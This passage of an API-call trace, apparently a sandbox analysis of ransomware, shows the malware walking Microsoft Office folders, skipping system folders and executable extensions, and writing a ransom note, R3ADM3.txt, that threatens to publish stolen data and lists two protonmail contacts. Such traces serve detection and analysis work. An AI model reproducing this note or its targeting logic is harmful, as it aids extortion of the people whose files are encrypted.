(HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0728 | out: hHeap=0xea0000) returned 1 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0728 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.328] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a71d800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3a71d800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x12600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Verve.thmx", cAlternateFileName="VERVE~1.THM")) returned 1 [0158.328] lstrcmpW (lpString1="Verve.thmx", lpString2=".") returned 1 [0158.328] lstrcmpW (lpString1="Verve.thmx", lpString2="..") returned 1 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".UAKXC") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".exe") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".dll") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".lnk") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".sys") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch=".msi") returned 0x0 [0158.328] StrStrIW (lpFirst="Verve.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0750 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0750 | out: hHeap=0xea0000) returned 1 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0750 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.329] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d03f100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5d03f100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2c681, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Waveform.thmx", cAlternateFileName="WAVEFO~1.THM")) returned 1 [0158.329] lstrcmpW (lpString1="Waveform.thmx", lpString2=".") returned 1 [0158.329] lstrcmpW (lpString1="Waveform.thmx", lpString2="..") returned 1 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".UAKXC") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".exe") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".dll") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".lnk") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".sys") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch=".msi") returned 0x0 [0158.329] StrStrIW (lpFirst="Waveform.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0778 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0778 | out: hHeap=0xea0000) returned 1 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0778 [0158.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34c18 [0158.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.330] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d03f100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5d03f100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2c681, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Waveform.thmx", cAlternateFileName="WAVEFO~1.THM")) returned 0 [0158.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeccf70 | out: hHeap=0xea0000) returned 1 [0158.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0158.330] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0158.330] Sleep (dwMilliseconds=0x32) [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32980 | out: hHeap=0xea0000) returned 1 [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32890 | out: hHeap=0xea0000) returned 1 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0158.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0158.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft office\\media\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0158.389] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0158.389] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0158.390] CloseHandle (hObject=0x6dc) returned 1 [0158.391] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.391] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0158.391] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6354c330, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6354c330, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0158.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0158.391] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6354c330, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6354c330, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.392] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0158.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0158.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CAGCAT10", cAlternateFileName="")) returned 1 [0158.392] lstrcmpW (lpString1="CAGCAT10", lpString2=".") returned 1 [0158.392] lstrcmpW (lpString1="CAGCAT10", lpString2="..") returned 1 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="tmp") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="winnt") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="temp") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="thumb") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="$Recycle.Bin") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="System Volume Information") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="Boot") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="Windows") returned 0x0 [0158.392] StrStrIW (lpFirst="CAGCAT10", lpSrch="Trend Micro") returned 0x0 [0158.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0158.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0158.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0158.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0158.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32890 [0158.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0158.393] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0158.393] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="tmp") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="winnt") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="temp") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="thumb") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="$Recycle.Bin") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="System Volume Information") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="Boot") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="Windows") returned 0x0 [0158.393] StrStrIW (lpFirst="OFFICE14", lpSrch="Trend Micro") returned 0x0 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e07a0 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0158.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e07a0 | out: hHeap=0xea0000) returned 1 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e07a0 [0158.393] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6354c330, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x6354c330, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6354c330, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0158.394] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0158.394] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0158.394] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0158.394] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6354c330, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x6354c330, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6354c330, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0158.394] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0158.394] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0158.394] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0158.394] Sleep (dwMilliseconds=0x32) [0158.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0158.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0158.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0158.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0158.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0158.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0158.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0158.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0158.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft office\\office14\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0158.740] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0158.740] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0158.741] CloseHandle (hObject=0x6dc) returned 1 [0158.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.741] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x63892170, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63892170, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0158.742] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0158.742] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x63892170, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63892170, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0158.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0158.744] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0158.744] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0158.744] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0158.745] StrStrIW (lpFirst="1033", lpSrch="tmp") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="winnt") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="temp") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="thumb") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="$Recycle.Bin") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="System Volume Information") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="Boot") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="Windows") returned 0x0 [0158.745] StrStrIW (lpFirst="1033", lpSrch="Trend Micro") returned 0x0 [0158.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0158.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0158.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0158.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0158.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0158.745] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x779e270, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x779e270, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0158.745] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0158.745] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0158.745] StrStrIW (lpFirst="1036", lpSrch="tmp") returned 0x0 [0158.745] StrStrIW (lpFirst="1036", lpSrch="winnt") returned 0x0 [0158.745] StrStrIW (lpFirst="1036", lpSrch="temp") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="thumb") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="$Recycle.Bin") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="System Volume Information") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="Boot") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="Windows") returned 0x0 [0158.746] StrStrIW (lpFirst="1036", lpSrch="Trend Micro") returned 0x0 [0158.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0158.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0158.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0158.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e07c8 [0158.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0158.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0158.746] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a4f390, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a4f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a4f390, 